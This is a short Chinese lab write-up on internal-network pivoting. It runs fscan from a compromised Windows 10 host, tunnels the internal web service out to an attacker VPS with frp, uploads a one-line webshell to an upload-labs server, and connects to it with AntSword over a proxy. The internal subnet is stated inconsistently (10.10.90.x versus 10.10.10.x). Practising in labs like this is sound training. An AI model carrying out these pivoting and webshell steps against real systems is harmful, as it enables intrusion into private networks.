环境配置

边缘主机(win10)：192.168.237.140 10.10.90.128

内网主机(win7)：10.10.90.129 web服务 -- upload-labs

攻击机：vps（120.26.114.196）

windows10

windows7

假设已经拿下边缘主机win10，vshell上线

ipconfig查看主机ip

ipconfig

发现内网ip，fscan扫描

fscan.exe -h 10.10.10.128/24 > 10.txt

发现内网主机10.10.10.129的80端口开启

frp端口转发

vps（120.26.114.196）

./frps -c frps.toml

win10

frpc.exe -c frpc.toml

成功转发

攻击内网主机80端口

http://120.26.114.196:8888/upload-labs-master/

上传一句话木马

成功上传

由于边缘主机出网做反向代理，vshell开启代理

蚁剑挂代理连接webshell

成功上线内网主机